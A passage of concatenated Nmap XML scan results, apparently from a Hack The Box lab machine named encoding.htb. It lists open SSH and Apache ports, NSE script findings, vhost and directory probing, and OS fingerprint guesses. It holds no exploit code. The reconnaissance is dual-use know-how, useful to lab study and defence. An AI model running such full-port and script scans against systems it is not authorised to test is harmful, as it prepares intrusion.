</script><script id="http-sitemap-generator" output="&#xa; Directory structure:&#xa; /&#xa; Other: 1; php: 1&#xa; /assets/css/&#xa; css: 1&#xa; /assets/img/&#xa; png: 1&#xa; /assets/js/&#xa; js: 1&#xa; Longest directory structure:&#xa; Depth: 2&#xa; Dir: /assets/img/&#xa; Total files found (by extension):&#xa; Other: 1; css: 1; js: 1; php: 1; png: 1&#xa;"/><script id="http-date" output="Sat, 28 Jan 2023 19:07:18 GMT; -18s from local time."><elem key="date">2023-01-28T19:07:18+00:00</elem>
<elem key="delta">-18.0</elem>
</script><script id="http-stored-xss" output="Couldn&apos;t find any stored XSS vulnerabilities."/><script id="http-traceroute" output="&#xa; HTML title&#xa; Hop #1: 400 Proxy Error&#xa; Hop #2: HaxTables&#xa; Hop #3: HaxTables&#xa; Status Code&#xa; Hop #1: 400&#xa; Hop #2: 200&#xa; Hop #3: 200&#xa; content-type&#xa; Hop #1: text/html; charset=iso-8859-1&#xa; Hop #2: text/html; charset=UTF-8&#xa; Hop #3: text/html; charset=UTF-8&#xa; content-length&#xa; Hop #1: 424&#xa; Hop #2&#xa; Hop #3&#xa;"/><script id="http-title" output="HaxTables"><elem key="title">HaxTables</elem>
</script><script id="http-malware-host" output="Host appears to be clean"/><script id="http-security-headers" output=""></script><script id="http-enum" output="&#xa; /includes/: Potentially interesting folder&#xa;"/><script id="http-php-version" output="Logo query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa&#xa;Credits query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa"/><script id="http-config-backup" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-chrono" output="Request times for /; avg: 172.22ms; min: 158.15ms; max: 186.15ms"/><script id="http-vhosts" output="&#xa;128 names had status 200"/></port>
</ports>
<times srtt="24650" rttvar="24650" to="123250"/>
</host>
<taskbegin task="NSE" time="1674933006"/>
<taskend task="NSE" time="1674933006"/>
<taskbegin task="NSE" time="1674933006"/>
<taskend task="NSE" time="1674933006"/>
<taskbegin task="NSE" time="1674933006"/>
<taskend task="NSE" time="1674933006"/>
<runstats><finished time="1674933006" timestr="Sat Jan 28 20:10:06 2023" summary="Nmap done at Sat Jan 28 20:10:06 2023; 1 IP address (1 host up) scanned in 160.94 seconds" elapsed="160.94" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1,117 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_full_tcp_nmap.xml 10.129.123.2 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_full_tcp_nmap.xml 10.129.123.2" start="1674932816" startstr="Sat Jan 28 20:06:56 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="SYN Stealth Scan" time="1674932816"/>
<taskend task="SYN Stealth Scan" time="1674932851" extrainfo="65535 total ports"/>
<taskbegin task="Service scan" time="1674932851"/>
<taskend task="Service scan" time="1674932857" extrainfo="2 services on 1 host"/>
<taskbegin task="Traceroute" time="1674932871"/>
<taskend task="Traceroute" time="1674932871"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1674932871"/>
<taskend task="Parallel DNS resolution of 1 host." time="1674932882"/>
<taskbegin task="NSE" time="1674932882"/>
<taskend task="NSE" time="1674932887"/>
<taskbegin task="NSE" time="1674932887"/>
<taskend task="NSE" time="1674932887"/>
<taskbegin task="NSE" time="1674932887"/>
<taskend task="NSE" time="1674932887"/>
<host starttime="1674932816" endtime="1674932887"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.123.2" addrtype="ipv4"/>
<hostnames>
<hostname name="encoding.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="65533">
<extrareasons reason="reset" count="65533" proto="tcp" ports="1-21,23-79,81-65535"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.9p1 Ubuntu 3ubuntu0.1" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.9p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=&#xa; 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK"><table>
<elem key="bits">256</elem>
<elem key="fingerprint">4fe3a667a227f9118dc30ed773a02c28</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=</elem>
</table>
<table>
<elem key="bits">256</elem>
<elem key="fingerprint">816e78766b8aea7d1babd436b7f8ecc4</elem>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.52" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.52</cpe></service><script id="http-title" output="HaxTables"><elem key="title">HaxTables</elem>
</script><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-server-header" output="Apache/2.4.52 (Ubuntu)"><elem>Apache/2.4.52 (Ubuntu)</elem>
</script></port>
</ports>
<os><portused state="open" proto="tcp" portid="22"/>
<portused state="closed" proto="tcp" portid="1"/>
<portused state="closed" proto="udp" portid="36902"/>
<osmatch name="Linux 5.0" accuracy="95" line="68042">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:5.0</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0 - 5.4" accuracy="95" line="68103">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="95"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.4" accuracy="94" line="68176">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:5.4</cpe></osclass>
</osmatch>
<osmatch name="HP P2000 G3 NAS device" accuracy="93" line="35037">
<osclass type="storage-misc" vendor="HP" osfamily="embedded" accuracy="93"><cpe>cpe:/h:hp:p2000_g3</cpe></osclass>
</osmatch>
<osmatch name="Linux 4.15 - 5.6" accuracy="93" line="67238">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="4.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:4</cpe></osclass>
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.3 - 5.4" accuracy="93" line="68140">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 2.6.32" accuracy="92" line="55653">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
</osmatch>
<osmatch name="Infomir MAG-250 set-top box" accuracy="92" line="59627">
<osclass type="media device" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:2.6</cpe></osclass>
<osclass type="media device" vendor="Infomir" osfamily="embedded" accuracy="92"><cpe>cpe:/h:infomir:mag-250</cpe></osclass>
</osmatch>
<osmatch name="Ubiquiti AirMax NanoStation WAP (Linux 2.6.32)" accuracy="92" line="61697">
<osclass type="WAP" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
<osclass type="WAP" vendor="Ubiquiti" osfamily="embedded" accuracy="92"><cpe>cpe:/h:ubnt:airmax_nanostation</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.7" accuracy="92" line="65885">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:3.7</cpe></osclass>
</osmatch>
<osfingerprint fingerprint="OS:SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=36902%PV=Y%DS=2%DC=T%G=Y%TM=63D5729&#xa;OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ&#xa;OS:(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O&#xa;OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=&#xa;OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSN&#xa;OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D&#xa;OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O&#xa;OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N&#xa;OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N&#xa;OS:%T=40%CD=S)&#xa;"/>
</os>
<uptime seconds="3975719" lastboot="Tue Dec 13 19:46:08 2022"/>
<distance value="2"/>
<tcpsequence index="262" difficulty="Good luck!" values="E618361A,593DA75B,E2320D48,4C9B4BB,C8D2C810,A696F0B3"/>
<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
<tcptssequence class="1000HZ" values="ECF86448,ECF864AC,ECF86511,ECF86576,ECF865DA,ECF8663E"/>
<trace port="1025" proto="tcp">
<hop ttl="1" ipaddr="10.10.14.1" rtt="25.62"/>
<hop ttl="2" ipaddr="10.129.123.2" rtt="26.90" host="encoding.htb"/>
</trace>
<times srtt="26038" rttvar="1163" to="100000"/>
</host>
<taskbegin task="NSE" time="1674932887"/>
<taskend task="NSE" time="1674932887"/>
<taskbegin task="NSE" time="1674932887"/>
<taskend task="NSE" time="1674932887"/>
<taskbegin task="NSE" time="1674932887"/>
<taskend task="NSE" time="1674932887"/>
<runstats><finished time="1674932887" timestr="Sat Jan 28 20:08:07 2023" summary="Nmap done at Sat Jan 28 20:08:07 2023; 1 IP address (1 host up) scanned in 71.78 seconds" elapsed="71.78" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1,114 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml 10.129.123.2 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml 10.129.123.2" start="1674932816" startstr="Sat Jan 28 20:06:56 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,521
4,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="SYN Stealth Scan" time="1674932816"/>
<taskend task="SYN Stealth Scan" time="1674932818" extrainfo="1000 total ports"/>
<taskbegin task="Service scan" time="1674932818"/>
<taskend task="Service scan" time="1674932824" extrainfo="2 services on 1 host"/>
<taskbegin task="Traceroute" time="1674932829"/>
<taskend task="Traceroute" time="1674932829"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1674932829"/>
<taskend task="Parallel DNS resolution of 1 host." time="1674932840"/>
<taskbegin task="NSE" time="1674932840"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<host starttime="1674932816" endtime="1674932845"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.123.2" addrtype="ipv4"/>
<hostnames>
<hostname name="encoding.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="998">
<extrareasons reason="reset" count="998" proto="tcp" ports="1,3-4,6-7,9,13,17,19-21,23-26,30,32-33,37,42-43,49,53,70,79,81-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200
,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.9p1 Ubuntu 3ubuntu0.1" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.9p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=&#xa; 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK"><table>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="bits">256</elem>
<elem key="fingerprint">4fe3a667a227f9118dc30ed773a02c28</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=</elem>
</table>
<table>
<elem key="type">ssh-ed25519</elem>
<elem key="bits">256</elem>
<elem key="fingerprint">816e78766b8aea7d1babd436b7f8ecc4</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.52" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.52</cpe></service><script id="http-title" output="HaxTables"><elem key="title">HaxTables</elem>
</script><script id="http-server-header" output="Apache/2.4.52 (Ubuntu)"><elem>Apache/2.4.52 (Ubuntu)</elem>
</script><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script></port>
</ports>
<os><portused state="open" proto="tcp" portid="22"/>
<portused state="closed" proto="tcp" portid="1"/>
<osmatch name="HP P2000 G3 NAS device" accuracy="91" line="35037">
<osclass type="storage-misc" vendor="HP" osfamily="embedded" accuracy="91"><cpe>cpe:/h:hp:p2000_g3</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0" accuracy="89" line="68042">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="89"><cpe>cpe:/o:linux:linux_kernel:5.0</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.4" accuracy="89" line="68176">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="89"><cpe>cpe:/o:linux:linux_kernel:5.4</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0 - 5.4" accuracy="88" line="68103">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="88"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="OpenWrt Kamikaze 7.09 (Linux 2.6.22)" accuracy="88" line="61524">
<osclass type="WAP" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="88"><cpe>cpe:/o:linux:linux_kernel:2.6.22</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.1" accuracy="88" line="62917">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="88"><cpe>cpe:/o:linux:linux_kernel:3.1</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.2" accuracy="88" line="64664">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="88"><cpe>cpe:/o:linux:linux_kernel:3.2</cpe></osclass>
</osmatch>
<osmatch name="AXIS 210A or 211 Network Camera (Linux 2.6.17)" accuracy="87" line="61815">
<osclass type="webcam" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="87"><cpe>cpe:/o:linux:linux_kernel:2.6.17</cpe></osclass>
<osclass type="webcam" vendor="AXIS" osfamily="embedded" accuracy="87"><cpe>cpe:/h:axis:210a_network_camera</cpe><cpe>cpe:/h:axis:211_network_camera</cpe></osclass>
</osmatch>
<osmatch name="OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34)" accuracy="87" line="46778">
<osclass type="WAP" vendor="Linux" osfamily="Linux" osgen="2.4.X" accuracy="87"><cpe>cpe:/o:linux:linux_kernel:2.4</cpe></osclass>
</osmatch>
<osmatch name="OpenWrt White Russian 0.9 (Linux 2.4.30)" accuracy="87" line="46817">
<osclass type="WAP" vendor="Linux" osfamily="Linux" osgen="2.4.X" accuracy="87"><cpe>cpe:/o:linux:linux_kernel:2.4.30</cpe></osclass>
</osmatch>
